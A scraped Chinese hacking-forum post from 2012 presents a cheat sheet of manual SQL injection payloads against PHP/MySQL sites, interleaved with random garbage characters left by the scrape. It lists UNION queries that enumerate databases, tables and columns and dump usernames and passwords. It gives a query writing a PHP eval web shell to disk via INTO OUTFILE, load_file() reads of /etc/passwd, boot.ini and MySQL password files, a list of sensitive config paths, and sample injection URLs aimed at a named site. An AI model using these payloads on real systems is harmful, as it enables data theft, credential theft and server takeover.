中国网络渗透测试联盟
标题:
PHP+MySQL 手工注入语句
[打印本页]
作者:
admin
时间:
2012-9-15 13:50
标题:
PHP+MySQL 手工注入语句
.
( X# n+ m2 |/ u) E8 g7 E
i$ w5 X* m$ [5 ~- w
暴字段长度
5 e, k3 f r* ]* n" X2 c
Order by num/*
9 ?+ z1 K% }1 x" T) O, E
匹配字段
" u2 O4 g# V" R* w- J6 S
and 1=1 union select 1,2,3,4,5…….n/*
6 e' m2 s7 @' O1 X( b2 T! H
暴字段位置
+ w( G2 \8 A S( ?6 P
and 1=2 union select 1,2,3,4,5…..n/*
. v9 P5 x5 f/ }6 |! `0 [) O9 y
利用内置函数暴数据库信息
. U/ ]. y2 ~; a1 G2 k
version() database() user()
- _6 Z7 k! Y% S0 W0 g: q+ o3 p
不用猜解可用字段暴数据库信息(有些网站不适用):
" Y; s7 c! @! m+ [, O( R* {' K% P
and 1=2 union all select version() /*
* ]3 C1 W' J2 i: K: h
and 1=2 union all select database() /*
! t4 h; ?/ o2 P v, f1 g! _9 D
and 1=2 union all select user() /*
# x% Y. s; z3 Z* y# O
操作系统信息:
2 o( c) Y0 Z( \- \1 r4 S
and 1=2 union all select @@global.version_compile_os from mysql.user /*
& Q* g8 p" ]- H; I
数据库权限:
+ Y3 ]. u' A4 S
and ord(mid(user(),1,1))=114 /* 返回正常说明为root
1 G/ p) d1 O+ ~) G& Y" @
暴库 (mysql>5.0)
3 q! D9 K9 g* Q7 i7 b, P+ _2 J. B
Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息
) J9 S8 R- P3 n
and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1
( }3 K8 Q1 g8 H+ j9 e
猜表
- ?4 u3 N+ Z. H5 I5 E% X
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=数据库(十六进制) limit 0(开始的记录,0为第一个开始记录),1(显示1条记录)—
/ ?2 ?8 r- m# {/ I
猜字段
3 e" i3 P' k6 _* E3 E0 u
and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名(十六进制)limit 0,1
5 L: s* f' x5 s& [9 n, r# |
暴密码
) f/ R0 x) _6 R( t9 g
and 1=2 Union select 1,2,3,用户名段,5,6,7,密码段,8,9 from 表名 limit 0,1
" q2 ?5 C1 S* H2 v/ s
高级用法(一个可用字段显示两个数据内容):
$ p% G, f4 A' q$ }! @% F2 {6 t1 r
Union select 1,2,3concat(用户名段,0x3c,密码段),5,6,7,8,9 from 表名 limit 0,1
% v# t6 L2 N% Q
直接写马(Root权限)
4 m5 u- k1 B, L1 q* i! r' q- I( A
条件:1、知道站点物理路径
3 ?1 i4 G) E/ c# \2 g
2、有足够大的权限(可以用select …. from mysql.user测试)
# M+ V6 B% I0 D5 a6 k8 w
3、magic_quotes_gpc()=OFF
& i' _5 _2 v. g" ~+ u1 T2 T
select ‘<?php eval($_POST[cmd])?>' into outfile ‘物理路径'
: ^( @7 ]; _6 E8 M3 M7 v: l
and 1=2 union all select 一句话HEX值 into outfile '路径'
: |- t3 I0 M8 I9 Q
load_file() 常用路径:
9 E; N( z! o! d. N
1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)
/ A: w7 a5 f( Z3 i" ?* i
2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
4 b# p# B* V' r1 k& Z
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
; d) e; x( l+ V* s1 _+ C; J$ C
3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
4 p; e7 L0 ~6 j; M) Q4 V8 w2 x* m
4、/etc tpd/conf tpd.conf或/usr/local/apche/conf tpd.conf 查看linux APACHE虚拟主机配置文件
. v% X( A8 ]" u2 v" u/ j6 ^/ |4 H
5、c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf 查看WINDOWS系统apache文件
0 V2 [5 ? l; f9 V% d' C
6、c:/Resin-3.0.14/conf/resin.conf 查看jsp开发的网站 resin文件配置信息.
9 s& q/ m& d$ ^8 M
7、c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
3 P+ I6 b/ E s$ K
8、d:\APACHE\Apache2\conf\httpd.conf
7 ?* [* @! l9 p# i6 n m
9、C:\Program Files\mysql\my.ini
$ t& l; u6 D1 j. a' r
10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径
3 Q. K; z# x0 a1 H! N% O, _
11、 c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置文件
0 s8 l- T7 i( z! U' P' T! }
12、 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
1 n# v2 M2 W5 c) H: S0 F3 H/ B
13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
3 k3 M/ j/ z: q* l1 C7 z
14 、/usr/local/app/apache2/conf/extra tpd-vhosts.conf APASHE虚拟主机查看
2 m; z% f* u3 ]4 ]$ q+ x9 N
15、 /etc/sysconfig/iptables 本看防火墙策略
|, R* ]1 R$ m; x7 U7 @
16 、 usr/local/app/php5 b/php.ini PHP 的相当设置
; ~* M* n) [8 K. W7 N' {
17 、/etc/my.cnf MYSQL的配置文件
% E: x! f) T4 f, Z" d- e
18、 /etc/redhat-release 红帽子的系统版本
0 O: H6 | U5 N$ ^8 I3 j8 Q
19 、C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
4 g' X K0 s3 L: l6 h
20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.
1 e- n6 y+ r* v1 S2 }1 f
21、/usr/local/app/php5 b/php.ini //PHP相关设置
g6 Z: d: V6 j% m! g
22、/usr/local/app/apache2/conf/extra tpd-vhosts.conf //虚拟网站设置
; t2 b h: K" |( A0 `
23、C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
# f3 O4 \0 |: r0 S( H9 ?8 o
24、c:\windows\my.ini
f! u1 V8 @, `% F, P B/ L
25、c:\boot.ini
_8 A( C$ }. n4 Z
网站常用配置文件 config.inc.php、config.php。load_file()时要用replace(load_file(HEX),char(60),char(32))
; r# }: l7 S* J% k0 \
注:
& O( x! R+ s2 d* n: f
Char(60)表示 <
: w1 v& U, c- W4 s, C
Char(32)表示 空格
- K, E! b) o) ?8 B$ b0 W' T7 m
手工注射时出现的问题:
" K& \7 r5 a. Q- O/ E, Y9 o$ U
当注射后页面显示:
; u# R9 b- l# |3 [9 T* J
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
+ j4 q! t) S6 s2 I
如:
http://www.hake.ccc./mse/researc ... 0union%20select%201
,load_file(0x433A5C626F6F742E696E69),3,4,user()%20
' y, T1 \. `% }7 J
这是由于前后编码不一致造成的,
1 H z6 ]! a4 z& |- b1 }' ?1 [
解决方法:在参数前加上 unhex(hex(参数))就可以了。上面的URL就可以改为:
; G* f/ D0 g. Y3 ?* m6 h2 i
http://www.hake.cc/mse/research/ ... 0union%20select%201
,unhex(hex(load_file(0x433A5C626F6F742E696E69))),3,4,unhex(hex(user()))%20
9 S/ \6 S; ~+ k! ^6 f" C
既可以继续注射了。。。
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2